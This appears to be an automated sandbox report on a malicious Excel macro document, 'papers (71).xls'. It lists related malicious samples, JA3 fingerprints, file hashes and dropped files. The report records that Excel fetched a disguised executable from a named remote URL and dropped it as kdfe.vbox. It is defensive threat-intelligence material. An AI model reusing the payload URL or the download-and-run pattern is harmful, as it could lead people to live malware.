                                claim (78).xlsGet hashmaliciousBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  GOOGLEUSDTN Basis AWS Basis Main.xlsmGet hashmaliciousBrowse
                                  • 74.125.71.156
                                  Xeros from condor.htmGet hashmaliciousBrowse
                                  • 142.250.184.33
                                  DTN Basis AWS Basis Main.xlsmGet hashmaliciousBrowse
                                  • 35.238.155.117
                                  DTN Basis AWS Basis Main.xlsmGet hashmaliciousBrowse
                                  • 74.125.71.157
                                  RFQ Order_xls.htmGet hashmaliciousBrowse
                                  • 142.250.184.33
                                  Att_1271190656_1029344678.xlsGet hashmaliciousBrowse
                                  • 216.239.32.21
                                  PO#00187.pptGet hashmaliciousBrowse
                                  • 142.250.184.97
                                  211094.exeGet hashmaliciousBrowse
                                  • 34.98.99.30
                                  FB_1401_4_5,pdf.exeGet hashmaliciousBrowse
                                  • 34.102.136.180
                                  dwg.exeGet hashmaliciousBrowse
                                  • 34.102.136.180
                                  DHL_receipt.exeGet hashmaliciousBrowse
                                  • 34.102.136.180
                                  UAE CONTRACT SUPPLY.exeGet hashmaliciousBrowse
                                  • 34.102.136.180
                                  14079 Revised #PO 4990.exeGet hashmaliciousBrowse
                                  • 34.102.136.180
                                  twistercrypted.exeGet hashmaliciousBrowse
                                  • 34.102.136.180
                                  Tide_v2.49.0_www.9apps.com_.apkGet hashmaliciousBrowse
                                  • 142.250.184.74
                                  tuOAqyHVuH.exeGet hashmaliciousBrowse
                                  • 35.228.227.140
                                  WB4L25Jv37.exeGet hashmaliciousBrowse
                                  • 35.228.227.140
                                  Tide_v2.49.0_www.9apps.com_.apkGet hashmaliciousBrowse
                                  • 142.250.186.106
                                  BL.htmlGet hashmaliciousBrowse
                                  • 142.250.186.33
                                  PrebuiltGmsCore.apkGet hashmaliciousBrowse
                                  • 172.217.16.142

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  7dcce5b76c8b17472d024758970a406bRFQ.xlsxGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Rep_#_475.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Rep_#_475.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  PO#00187.pptGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  EmIVSpcKNs.xlsGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  data.xlsGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  PDA BGX00001A DA Query Notification BGX009RE09000001A.xlsxGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  QUOTATION.xlsxGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Notification 466022.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Fax #136.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Notification 466022.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Fax #136.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Reports #176.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Reports #176.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  SecuriteInfo.com.VB.Heur2.EmoDldr.5.B611173F.Gen.18420.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  SecuriteInfo.com.VB.Heur2.EmoDldr.5.B611173F.Gen.18420.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Scan #84462.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Invoice_#_6774.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Scan #84462.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213
                                  Invoice_#_6774.xlsmGet hashmaliciousBrowse
                                  • 104.196.7.213

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gifdocument-2026051106.xlsGet hashmaliciousBrowse
                                    C:\Users\user\kdfe.vboxdocument-2026051106.xlsGet hashmaliciousBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                      Category:dropped
                                      Size (bytes):59134
                                      Entropy (8bit):7.995450161616763
                                      Encrypted:true
                                      SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                      MD5:E92176B0889CC1BB97114BEB2F3C1728
                                      SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                      SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                      SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):328
                                      Entropy (8bit):3.090852246460564
                                      Encrypted:false
                                      SSDEEP:6:kKoVpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:wu3kPlE99SNxAhUeo+aKt
                                      MD5:692724BD422FA3EF4631C728FE131F63
                                      SHA1:638FCA07AAA09ED014472B7E8E0B3EE3DE83B7C1
                                      SHA-256:4DC8B477491080BAB168E27E85350F09220DF7B024FFA677ABA3034F32C01FB1
                                      SHA-512:7471069A0F50FFD9E5F42BF3B198162D2BCD0562A2A5CEEF70545802598F266AD974E9C973365929A69176E34CFE0B820E9C4BFCBA42B62CCBD7324B1A9A2EE5
                                      Malicious:false
                                      Reputation:low
                                      Preview: p...... ........5.......(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gif
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS-DOS executable, MZ for MS-DOS
                                      Category:downloaded
                                      Size (bytes):326656
                                      Entropy (8bit):5.743836077781214
                                      Encrypted:false
                                      SSDEEP:6144:uAKEJtauc+yxnE2aRngUpIlM6W5mezkthY7nOCzxT:nKEGuc+y5EXVpIlomJVuxT
                                      MD5:C932CF352C7F9A7748DC28B3B1A8AC1C
                                      SHA1:D79AC5E409FC6ED8243C6824A7B5E8DAEF6320B6
                                      SHA-256:743677C0B3ADCAAD1C801E7B9AB5B116CA6AAC844976A18520151A2310B7F4D8
                                      SHA-512:666446768759973FA4E09888E9980C6D91D4EB0ED34A5C94D05D25ABA337E1624B43AE525203CD4E0F69D2C36FB7C2F0A8006EF8935A716C04537AFC73C1CF65
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Metadefender, Detection: 22%, Browse
                                      • Antivirus: ReversingLabs, Detection: 89%
                                      Joe Sandbox View:
                                      • Filename: document-2026051106.xls, Detection: malicious, Browse
                                      Reputation:low
                                      IE Cache URL:https://remedial.aaua.edu.ng/ds/1502.gif
                                      Preview: MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F,`...........!.........P......T.............@..................................Q..................................................................................................................................P............................text...5........................... ..`.rdata..L........D..................@....data...0................................reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\37CE0000
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):305996
                                      Entropy (8bit):7.987867554579271
                                      Encrypted:false
                                      SSDEEP:6144:F+KrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+Myp:wKFPM8R3AsB+bjej/9cv
                                      MD5:C4145EB855DF4BBFE34111E40285ECBD
                                      SHA1:D4C0608F04809F1F7E50B85D29178CB2D242046D
                                      SHA-256:A4E21209B7D54FBE5E7F53CC8E1BD9FE0DE861EDBFC754E9B8B075676C3F4B29
                                      SHA-512:B7D88A088A2ED9D1D5D6A9EE4E357F2499BDE2761706BDD7503358652D37B8E0C02CEDBD59932E3C36C04D5F6AC8ADFBD11DA350833349F6E91BF2C0F8DBA372
                                      Malicious:false
                                      Reputation:low
                                      Preview: .U.n.0....?..........C....I?.&..an.0.........,.\.Qo.7.pz.........7.V..^i......;.0.....Z..d../g..u....e}J...({........G+....!...~1.|.....)s....,.I...o..c...{Y.e"...Hd..;.#R..BKP^.Y.n0D..{.dM..&.x.)Qa..^...Mm...|?".....!......u.......r8.........Z..GXJ.....q9.~..'.aZ.a%.4%.......s..&.{txD. ....../?..........`.:nN6..?..XF.../>S..y[..r....F....1......!.S.E.u.h~t.n.9.....C......>...az.}@...^.....:...a;....."M....l..w..j.6/...?.......PK..........!.\lC.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\CabCFCE.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                      Category:dropped
                                      Size (bytes):59134
                                      Entropy (8bit):7.995450161616763
                                      Encrypted:true
                                      SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                      MD5:E92176B0889CC1BB97114BEB2F3C1728
                                      SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                      SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                      SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                      C:\Users\user\AppData\Local\Temp\TarCFCF.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):152788
                                      Entropy (8bit):6.316654432555028
                                      Encrypted:false
                                      SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                      MD5:64FEDADE4387A8B92C120B21EC61E394
                                      SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                      SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                      SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                      Malicious:false
                                      Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Feb 26 05:38:36 2021, atime=Fri Feb 26 05:38:36 2021, length=8192, window=hide
                                      Category:dropped
                                      Size (bytes):867
                                      Entropy (8bit):4.489952216771138
                                      Encrypted:false
                                      SSDEEP:12:85QZYyLgXg/XAlCPCHaXgzB8IB/hA/vX+WnicvblubDtZ3YilMMEpxRljKlcTdJU:85gYE/XTwz6IovYeYDv3qEwrNru/
                                      MD5:84CDCDF190E99930C223237FD9C8A11E
                                      SHA1:9C0B7C3C7C9964ED185DADB3EC5DFB9B55425B3A
                                      SHA-256:FE7B6093E08E1A8825D7BE0E5B4D907437B5FBE8ECD4DD1945C44EED5B3C1248
                                      SHA-512:88F3A90C184C5F42215C07D3453C2718C5EA9E6DDC64ACA6E619E4D9843D827C7AE2498E41F75A085FD6999BEE243DB535FF621D3416706DCEDE84AFB09219D4
                                      Malicious:false
                                      Preview: L..................F...........7G................... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....ZR.4..Desktop.d......QK.XZR.4*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\226533\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226533..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):86
                                      Entropy (8bit):4.525508685137814
                                      Encrypted:false
                                      SSDEEP:3:oyBVomMSyOMYN8yOMYmMSyOMYv:dj6nW8CKnC
                                      MD5:EDF60D83CCAB67BD5BFC76D5DDA0BDC6
                                      SHA1:C56804439508CC2F53660124CCA58D3FCC22A875
                                      SHA-256:2E020778CF18570624508E47E1C99AE3F0A50BAFEAFE78C11D14C2E3BC8FBF55
                                      SHA-512:05EA3D77EFC669C9B784BEBB05B695A752EB69F933E8835D86B2D4D1EF08594DCCA5BEEAC3F854DF584884B842648A66C7D82B02A31B71604C7BBBFF6C32F53B
                                      Malicious:false
                                      Preview: Desktop.LNK=0..[xls]..papers (71).LNK=0..papers (71).LNK=0..[xls]..papers (71).LNK=0..
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\papers (71).LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Fri Feb 26 05:38:36 2021, atime=Fri Feb 26 05:38:36 2021, length=325632, window=hide
                                      Category:dropped
                                      Size (bytes):2038
                                      Entropy (8bit):4.533067647961305
                                      Encrypted:false
                                      SSDEEP:48:8JGMk/XT3IkPN9iEwQh2JGMk/XT3IkPN9iEwQ/:8MMk/XLIkziXQh2MMk/XLIkziXQ/
                                      MD5:8520D3BC302F533DCB537C88A195095A
                                      SHA1:7F6EE50FDC451E1C2BE9FF52690D4F57CD1B2AC1
                                      SHA-256:1B9B072AA0CA301B60D5B230FB329DFA1E047A9F87175F993CF6D29301A34C20
                                      SHA-512:2C13C46D05A76462A0055C4661F9FD67417A3744B1EA32C6DB3896EEF0E13F90FB4D423EC8B0DE455E0D68892806D8439CB81B311F47AB8E72BFE2715201A736
                                      Malicious:false
                                      Preview: L..................F.... .....+..{...............................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.....ZR.4 .PAPERS~1.XLS..L.......Q.y.Q.y*...8.....................p.a.p.e.r.s. .(.7.1.)...x.l.s.......y...............-...8...[............?J......C:\Users\..#...................\\226533\Users.user\Desktop\papers (71).xls.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.a.p.e.r.s. .(.7.1.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226533..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                      C:\Users\user\Desktop\C8CE0000
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:Applesoft BASIC program data, first line number 16
                                      Category:dropped
                                      Size (bytes):378764
                                      Entropy (8bit):7.266108658166712
                                      Encrypted:false
                                      SSDEEP:6144:dcKoSsxzNDZLDZjlbR868O8KL5L+2e32xEtjPOtioVjDGUU1qfDlavx+W2QnAFEy:ReLUIRfUI5uXL6nDJoA3
                                      MD5:762EA096753219A36F8BC5C301A84E1A
                                      SHA1:6D272667EE39E7B222DC2830CDE34C97A7E7BC96
                                      SHA-256:0849A116ABFEFDDD2E72DD473A45770B2C35311BED58BFB9BC4BE1D02D387EB4
                                      SHA-512:9DD61733F9231DCC1BF786EAD61F9AA6C237FEC78D213B9F8FB61985B8E1D14F112C6D35E2E3E25AFBEBCEB74431D469F23B23BA5D58C3FF70A312CD08D341F4
                                      Malicious:false
                                      Preview: ........g2.........................\.p.... B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........
                                      C:\Users\user\kdfe.vbox
                                      Process:C:\Windows\SysWOW64\explorer.exe
                                      File Type:MS-DOS executable, MZ for MS-DOS
                                      Category:dropped
                                      Size (bytes):326656
                                      Entropy (8bit):0.009760032915619981
                                      Encrypted:false
                                      SSDEEP:6:idqGVg3F+X32Q3Es2I/Gyuelxj/BETlPlcRrv:etGSGQ3EkV/lxj/isv
                                      MD5:D64A0EAA481037030A4DEF6D5D958C8C
                                      SHA1:55618BA84537EA39F5675B1D0CC3BC16A95D0037
                                      SHA-256:2A6DC00BDCACD9E65A4B99D9D8DD4DB64554A2DB3E5F0A2F9D2702B99D88AC0F
                                      SHA-512:FF5AD2D8CBB7087752DA3B2FCCF8C2C45059FA545DC0719AA90765D145DF76BC77BF1589735ACF01547C67763B64AE6998590A7DFA59AE41D0302453C0298B4B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Joe Sandbox View:
                                      • Filename: document-2026051106.xls, Detection: malicious, Browse
                                      Preview: MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F,`...........!.........P......T.............@..................................Q..................................................................................................................................P............................text...5........................... ..`.rdata..L........D..................@....data...0................................reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 15 09:57:52 2021, Security: 0
                                      Entropy (8bit):7.590232194331203
                                      TrID:
                                      • Microsoft Excel sheet (30009/1) 78.94%
                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                      File name:papers (71).xls
                                      File size:325632
                                      MD5:540499ef024a652fea8780e11398f03c
                                      SHA1:33da766338fa9fd840b1f43a6330a0af8cfa0a39
                                      SHA256:8dfff9a2ff5cb2b8d70cf43fd0dc7a521570105d623cf28b76f8c66a9a664dd6
                                      SHA512:63758c69b8315b2dd1944451b614b459298bc1ce2aa3468f46aba58a5008f1c05457f528cabe2fdbdf19d0e90697eb34f80acb778fe5d6560c7ec672b117c144
                                      SSDEEP:6144:mcKoSsxzNDZLDZjlbR868O8KlVH3Be3q7uDphYHceXVhca+fMHLty/xcl8uUM+7d:eeLUIRfUI5uXL6nDJop
                                      File Content Preview:........................>.......................z...........................u...v...w...x...y..................................................................................................................................................................

                                      File Icon

                                      Icon Hash:e4eea286a4b4bcb4

                                      Static OLE Info

                                      General

                                      Document Type:OLE
                                      Number of OLE Files:1

                                      OLE File "papers (71).xls"

                                      Indicators

                                      Has Summary Info:True
                                      Application Name:Microsoft Excel
                                      Encrypted Document:False
                                      Contains Word Document Stream:False
                                      Contains Workbook/Book Stream:True
                                      Contains PowerPoint Document Stream:False
                                      Contains Visio Document Stream:False
                                      Contains ObjectPool Stream:
                                      Flash Objects Count:
                                      Contains VBA Macros:True

                                      Summary

                                      Code Page:1251
                                      Author:
                                      Last Saved By:
                                      Create Time:2006-09-16 00:00:00
                                      Last Saved Time:2021-02-15 09:57:52
                                      Creating Application:Microsoft Excel
                                      Security:0

                                      Document Summary

                                      Document Code Page:1251
                                      Thumbnail Scaling Desired:False
                                      Contains Dirty Links:False
                                      Shared Document:False
                                      Changed Hyperlinks:False
                                      Application Version:917504

                                      Streams

                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                      General
                                      Stream Path:\x5DocumentSummaryInformation
                                      File Type:data
                                      Stream Size:4096
                                      Entropy:0.337451371743
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 1 . . . . . D o c 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00
                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                      General
                                      Stream Path:\x5SummaryInformation
                                      File Type:data
                                      Stream Size:4096
                                      Entropy:0.246544706818
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 313688
                                      General
                                      Stream Path:Workbook
                                      File Type:Applesoft BASIC program data, first line number 16
                                      Stream Size:313688
                                      Entropy:7.72012402668
                                      Base64 Encoded:True
                                      Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                      Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                      Macro 4.0 Code

